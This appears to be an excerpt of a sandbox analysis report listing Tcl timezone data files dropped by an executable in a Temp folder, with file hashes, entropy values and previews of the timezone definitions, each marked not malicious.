                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Tell_City) {. {-9223372036854775808 -20823 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-289414800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-260989200 -21600 0 CST}
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6350
                                                                                                                                                                                                                                                    Entropy (8bit):3.782861360101505
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Vevay) {. {-9223372036854775808 -20416 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-495043200 -18000 0 EST}. {-31518000 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {94712400 -18000 0 EST}. {1136091600 -18000 0 EST}. {1143961200 -14400 1 EDT}. {1162101600 -18000 0 EST}. {1173596400 -14400 1 EDT}. {1194156000 -18000 0 EST}. {1205046000 -14400 1 EDT}. {1225605600 -18000 0 EST}. {1236495600 -14400 1 EDT}. {1257055200 -18000 0 EST}. {1268550000 -14400 1 EDT}. {1289109600 -18000
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6992
                                                                                                                                                                                                                                                    Entropy (8bit):3.795913753683276
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Vincennes) {. {-9223372036854775808 -21007 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-289414800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-260989200 -21600 0 CST}
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7170
                                                                                                                                                                                                                                                    Entropy (8bit):3.7942292979267767
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Winamac) {. {-9223372036854775808 -20785 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-447267600 -21600 0 CST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):228
                                                                                                                                                                                                                                                    Entropy (8bit):4.655121947675421
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Indianapolis)]} {. LoadTimeZoneFile America/Indiana/Indianapolis.}.set TZData(:America/Indianapolis) $TZData(:America/Indiana/Indianapolis).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7389
                                                                                                                                                                                                                                                    Entropy (8bit):3.78271920608107
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:/YGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:/JVUC2mWBNwWTxyWR
                                                                                                                                                                                                                                                    MD5:EA93F2A5DE3CED689C8A9664E31D9174
                                                                                                                                                                                                                                                    SHA1:EF81F6A41767084F8C8DC629E0C084C947DA3E2A
                                                                                                                                                                                                                                                    SHA-256:8892A520B306C18A55B2114E1EC9514263F818801D8A0C3A9B8C6E4345B73A0E
                                                                                                                                                                                                                                                    SHA-512:5A237535A8C875D9E734D4A37DA3DB1B1ED86DB407E9E741E1EF241697B9314BA6A3C934227B6D776168C324EC1EE3C939DF1BEB2540342A502AA78DB0E97020
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Inuvik) {. {-9223372036854775808 0 0 zzz}. {-536457600 -28800 0 PST}. {-147888000 -21600 1 PDDT}. {-131558400 -28800 0 PST}. {315558000 -25200 0 MST}. {325674000 -21600 1 MDT}. {341395200 -25200 0 MST}. {357123600 -21600 1 MDT}. {372844800 -25200 0 MST}. {388573200 -21600 1 MDT}. {404899200 -25200 0 MST}. {420022800 -21600 1 MDT}. {436348800 -25200 0 MST}. {452077200 -21600 1 MDT}. {467798400 -25200 0 MST}. {483526800 -21600 1 MDT}. {499248000 -25200 0 MST}. {514976400 -21600 1 MDT}. {530697600 -25200 0 MST}. {544611600 -21600 1 MDT}. {562147200 -25200 0 MST}. {576061200 -21600 1 MDT}. {594201600 -25200 0 MST}. {607510800 -21600 1 MDT}. {625651200 -25200 0 MST}. {638960400 -21600 1 MDT}. {657100800 -25200 0 MST}. {671014800 -21600 1 MDT}. {688550400 -25200 0 MST}. {702464400 -21600 1 MDT}. {720000000 -25200 0 MST}. {733914000 -
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7421
                                                                                                                                                                                                                                                    Entropy (8bit):3.7514030267117118
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:b/GC3XmzdsHRwvOTFhP5S+ijFnRaJeaX1eyDt:b/Pn0gqvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:A9A59966C4F90AEE45E5DBE2FAFD6ACF
                                                                                                                                                                                                                                                    SHA1:FFFE0614CFEE9477311943211DA6A8988E7381F1
                                                                                                                                                                                                                                                    SHA-256:356CA4C5D302EB72566254E58CE6570C45EB1399C8CC2B4CE0369778B10E9329
                                                                                                                                                                                                                                                    SHA-512:FD62119A86EEC7CFFF0F9179BF7C4DFD0BC4A6CF46D79349821DEFECB4E0FD20DAECBE7F038B0EA1694DADA8F0087E2AFC0E4D6F81DFF26586719FEEC9E461F0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Iqaluit) {. {-9223372036854775808 0 0 zzz}. {-865296000 -14400 0 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {-147898800 -10800 1 EDDT}. {-131569200 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {452070000 -14400 1 EDT}. {467791200 -18000 0 EST}. {483519600 -14400 1 EDT}. {499240800 -18000 0 EST}. {514969200 -14400 1 EDT}. {530690400 -18000 0 EST}. {544604400 -14400 1 EDT}. {562140000 -18000 0 EST}. {576054000 -14400 1 EDT}. {594194400 -18000 0 EST}. {607503600 -14400 1 EDT}. {625644000 -18000 0 EST}. {638953200 -14400 1 EDT}. {657093600 -18000 0 EST}. {671007600 -14400 1 EDT}. {688543200 -18000 0 EST}. {702457200 -14400 1 EDT}. {71999280
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):818
                                                                                                                                                                                                                                                    Entropy (8bit):4.143709781460862
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ1elRMKFD/u/Ip/uJD/u2lR/utzN54i/uhU/ufUF5/uDBq/u63gU/u3Zh/u4u8H:5ORMKFYIgxmzfwuFqBG3g/k8H
                                                                                                                                                                                                                                                    MD5:CA9F0DD0E18DA275428256D91A2BA770
                                                                                                                                                                                                                                                    SHA1:6EBE0E360198C6CDD17232F0495FD7E557D4FB82
                                                                                                                                                                                                                                                    SHA-256:A1DD498E04962E02AECF2221E8CC82BC886E0062DC0416384825708C4213A2AD
                                                                                                                                                                                                                                                    SHA-512:FFC4F290439A444C6D539A6C5A29EB578BDA708D0005C9706E510E8EDA5C8664D369CBEC320A1FC28AD198084318298388689A66520CF6A8EFDD5391AEBC6B2E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Jamaica) {. {-9223372036854775808 -18431 0 LMT}. {-2524503169 -18431 0 KMT}. {-1827687169 -18000 0 EST}. {126248400 -18000 0 EST}. {126687600 -14400 1 EDT}. {152085600 -18000 0 EST}. {162370800 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {441781200 -18000 0 EST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):206
                                                                                                                                                                                                                                                    Entropy (8bit):4.89710274358395
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7/MI1VAIgp/MI+290pPGe90/MIE:MBaIMY/Mvp/Mh290h390/MB
                                                                                                                                                                                                                                                    MD5:320C83EFE59FD60EB9F5D4CF0845B948
                                                                                                                                                                                                                                                    SHA1:5A71DFAE7DF9E3D8724DFA533A37744B9A34FFEC
                                                                                                                                                                                                                                                    SHA-256:67740B2D5427CFCA70FB53ABD2356B62E01B782A51A805A324C4DFAD9ACA0CFA
                                                                                                                                                                                                                                                    SHA-512:D7A6378372386C45C907D3CB48B923511A719794B0C0BFA3694DBCE094A46A48249720653836C2F10CBB2178DD8EEEEA6B5019E4CC6C6B650FD7BE256BE1CA99
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Jujuy)]} {. LoadTimeZoneFile America/Argentina/Jujuy.}.set TZData(:America/Jujuy) $TZData(:America/Argentina/Jujuy).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8406
                                                                                                                                                                                                                                                    Entropy (8bit):3.882476905033879
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:JZL19jPaps/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:fB9jPP/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                    MD5:C2C6145B7E41983259343FFE5992EA35
                                                                                                                                                                                                                                                    SHA1:467D9EBCF3F0A5FC5B03F662A606125F5C10692F
                                                                                                                                                                                                                                                    SHA-256:189658620FE07CF20EEABCD3968A9C1A497576F83592C9622D964E48FC4E9A51
                                                                                                                                                                                                                                                    SHA-512:41C791BF2885B5C0ED7DE5DB1B34B22F67C699C0E3248563DAA8DAEE92E2D02168F6CC21DE6D1B3EDEFC71E6FDFD09AEDB1D768A8435583C14FACCA59CF1C686
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Juneau) {. {-9223372036854775808 54139 0 LMT}. {-3225366139 -32261 0 LMT}. {-2188954939 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677600
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9332
                                                                                                                                                                                                                                                    Entropy (8bit):3.769996646995791
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:wmXxSkUArUfxLURWu3O5bMQxXI6Xah0drn+qvOTFhPI1jFIL:wmXxSkUArUfxLUwu3O5bMQxXI6Xah2n8
                                                                                                                                                                                                                                                    MD5:D9BC20AFD7DA8643A2091EB1A4B48CB3
                                                                                                                                                                                                                                                    SHA1:9B567ABF6630E7AB231CAD867AD541C82D9599FF
                                                                                                                                                                                                                                                    SHA-256:B4CC987A6582494779799A32A9FB3B4A0D0298425E71377EB80E2FB4AAAEB873
                                                                                                                                                                                                                                                    SHA-512:0BC769A53E63B41341C25A0E2093B127064B589F86483962BD24DB4082C4466E12F4CD889B82AD0134C992E984EF0897113F28321522B57BA45A98C15FF7E172
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Kentucky/Louisville) {. {-9223372036854775808 -20582 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-1546279200 -21600 0 CST}. {-1535904000 -18000 1 CDT}. {-1525280400 -21600 0 CST}. {-905097600 -18000 1 CDT}. {-891795600 -21600 0 CST}. {-883591200 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-744224400 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-684349200 -18000 1 CDT}. {-652899600 -18000 1 CDT}. {-620845200 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):8279
Entropy (8bit):3.785637200740036
Encrypted:false
SSDEEP:192:jFPXxEOdXkqbfkeTzZSJw5/9/yuvQ+hcrD57X0N41+gqvOTFhPI1jFIL:5PXxEOdXkqbfNTzZSJw5/9/yuvQ6crD9
MD5:0C6F5C9D1514DF2D0F8044BE27080EE2
SHA1:70CBA0561E4319027C60FB0DCF29C9783BFE8A75
SHA-256:1515460FBA496FE8C09C87C51406F4DA5D77C11D1FF2A2C8351DF5030001450F
SHA-512:17B519BCC044FE6ED2F16F2DFBCB6CCE7FA83CF17B9FC4A40FDA21DEFBA9DE7F022A50CF5A264F3090D57D51362662E01C3C60BD125430AEECA0887BB8520DB1
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Kentucky/Monticello) {. {-9223372036854775808 -20364 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-63136800 -21600 0 CST}. {-52934400 -18000 1 CDT}. {-37213200 -21600 0 CST}. {-21484800 -18000 1 CDT}. {-5763600 -21600 0 CST}. {9964800 -18000 1 CDT}. {25686000 -21600 0 CST}. {41414400 -18000 1 CDT}. {57740400 -21600 0 CST}. {73468800 -18000 1 CDT}. {89190000 -21600 0 CST}. {104918400 -18000 1 CDT}. {120639600 -21600 0 CST}. {126691200 -18000 1 CDT}. {152089200 -21600 0 CST}. {162374400 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 C
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):199
Entropy (8bit):4.8191308888643345
Encrypted:false
SSDEEP:6:SlSWB9IZaM3y73GKXFVAIgp3GK4N2901iZ903GKk:MBaIMY3GKXQp3GKe290Q903GKk
MD5:465D405C9720EB7EC4BB007A279E88ED
SHA1:7D80B8746816ECF4AF45166AED24C731B60CCFC6
SHA-256:BE85C86FBD7D396D2307E7DCC945214977829E1314D1D71EFAE509E98AC15CF7
SHA-512:C476022D2CC840793BF7B5841051F707A30CCAB1022E30FB1E45B420077417F517BEDA5564EFB154283C7C018A9CA09D10845C6A1BFE2A2DE7C939E307BDCE6F
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Knox)]} {. LoadTimeZoneFile America/Indiana/Knox.}.set TZData(:America/Knox_IN) $TZData(:America/Indiana/Knox).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):187
Entropy (8bit):4.810917109656368
Encrypted:false
SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx09CvjHVAIg209CvjvQ2IAcGE1QOa0IAcGE9Cvju:SlSWB9IZaM3y79CzVAIgp9CE2901Qv0k
MD5:4763D6524D2D8FC62720BCD020469FF6
SHA1:EE567965467E4F3BDFE4094604E526A49305FDD8
SHA-256:A794B43E498484FFD83702CFB9250932058C01627F6F6F4EE1432C80A9B37CD6
SHA-512:37462E0A3C24D5BAEBDD1ADCF8EE94EA07682960D710D57D5FD05AF9C5F09FF30312528D79516A16A0A84A2D351019DBB33308FC39EC468033B18FB0AC872C13
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Curacao)]} {. LoadTimeZoneFile America/Curacao.}.set TZData(:America/Kralendijk) $TZData(:America/Curacao).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):211
Entropy (8bit):4.906725349443972
Encrypted:false
SSDEEP:3:SlEVFRKvJT8QFx52IAcGEyUMWkXGm2OHpJvvvX+nFp1vZSsXxymxvUmBXlVvxC:SlSWB9X5290Xm2OHphvPKZpydmBVVI
MD5:6682484C3A44609C949CA050DF75F9F0
SHA1:6BCFA42D53F55FE7D9F12533C0E79B0C6D3F9BF2
SHA-256:1476CDDA7BBDD80542FE7EE81516511C47B2CDA336D7290D7329C43D43CE90BB
SHA-512:5B5FB9CF6E156B058CCDEBEC4C3A1941D7F5AF59C4AB00FDE5ACBD71A1D006960D7A151BF575349DC961AE4CADA8406080C77281AA5960338374882FF38FF4AF
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/La_Paz) {. {-9223372036854775808 -16356 0 LMT}. {-2524505244 -16356 0 CMT}. {-1205954844 -12756 1 BOST}. {-1192307244 -14400 0 BOT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):447
Entropy (8bit):4.3934794282318315
Encrypted:false
SSDEEP:12:MBp5290BbmdH4VPvut/Na/k0QXR/uFmC3/kFe/uFis/kZ/kkF/k88/kUS1F5/kL:cQye8mVNa85R/uH8o/u4s8Z8O8V8USPS
MD5:8B7AA48D355E4DFCA5F70CF5D6EF7757
SHA1:817CDC27C7CB4642A7BD3239506ECAECB1852815
SHA-256:893146B4F7521C089A22354A8314812736AAF8C64DFF0364A1083A4181BDEA48
SHA-512:38E2FC1774718BC10EB1440DDCE83310262086D14DA17E157873B86814EFCDB047687F05D44B168206AE752ADAC5BF2E78FDD3676B7CC65D0144B0869F1E9481
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Lima) {. {-9223372036854775808 -18492 0 LMT}. {-2524503108 -18516 0 LMT}. {-1938538284 -14400 0 PEST}. {-1002052800 -18000 0 PET}. {-986756400 -14400 1 PEST}. {-971035200 -18000 0 PET}. {-955306800 -14400 1 PEST}. {-939585600 -18000 0 PET}. {512712000 -18000 0 PET}. {544248000 -18000 0 PET}. {638942400 -18000 0 PET}. {765172800 -18000 0 PET}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):9409
Entropy (8bit):3.765996600201645
Encrypted:false
SSDEEP:192:lWf/5LB6xN9jgNf+aNwj/lpmlOxnKcndIG:lW35LB6xN9wfefnK6
MD5:3647C4B5DEE91CF5D9F69683719A0DE1
SHA1:99A2399CA36C06F80094875EE6EE505A2347D0B0
SHA-256:C4E241FED91FA8CA0AE3DD44528BB962FC86F505865BABD2FD5621B9FAE3AE12
SHA-512:051FC88881E21BC1B1BE22410A16A79F122051D5DA7FF24E9A01D1265960058827E814BFFE51B9592F2186E57305B6259A81064A006247973F26EFE949D6ACCF
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Los_Angeles) {. {-9223372036854775808 -28378 0 LMT}. {-2717640000 -28800 0 PST}. {-1633269600 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-1601820000 -25200 1 PDT}. {-1583679600 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-687967200 -25200 1 PDT}. {-662655600 -28800 0 PST}. {-620834400 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589384800 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557935200 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526485600 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-368632800 -25200 1 PDT}. {-355330800 -28800 0 PST}. {
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):223
Entropy (8bit):4.866250035215905
Encrypted:false
SSDEEP:6:SlSWB9IZaM3y71PiKp4ozFVAIgp1PiKp4zL290hp4901PiKp4/:MBaIMYPyJpPyzL290P490Py/
MD5:3BAD2D8B6F2ECB3EC0BFA16DEAEBADC3
SHA1:2E8D7A5A29733F94FF247E7E62A7D99D5073AFDC
SHA-256:242870CE8998D1B4E756FB4CD7097FF1B41DF8AA6645E0B0F8EB64AEDC46C13C
SHA-512:533A6A22A11C34BCE3772BD85B6A5819CCCD98BF7ECED9E751191E5D1AD3B84F34D70F30936CFE501C2FA3F6AAC7ABB9F8843B7EB742C6F9C2AD4C22D5C73740
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Kentucky/Louisville)]} {. LoadTimeZoneFile America/Kentucky/Louisville.}.set TZData(:America/Louisville) $TZData(:America/Kentucky/Louisville).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):190
Entropy (8bit):4.81236985301262
Encrypted:false
SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx09CvjHVAIg209CvjvQ2IAcGEyOqdVM1h4IAcGE9Cva:SlSWB9IZaM3y79CzVAIgp9CE290h48hf
MD5:EBB062CC0AA5C21F7C4278B79B9EAE6C
SHA1:6DFC8303BBE1FB990D7CB258E7DBC6270A5CFE64
SHA-256:4842420076033349DD9560879505326FFAB91BED75D6C133143FFBBFB8725975
SHA-512:5087C6257CA797317D049424324F5DC31BBD938436DCEB4CF4FE3D2520F7745F1C023E3EC48689957E389900EF2AACB3F5E9E49FD154DF51FF89F9A7173818CD
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Curacao)]} {. LoadTimeZoneFile America/Curacao.}.set TZData(:America/Lower_Princes) $TZData(:America/Curacao).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1507
                                                                                                                                                                                                                                                    Entropy (8bit):3.958253749053277
                                                                                                                                                                                                                                                    Encrypted:false
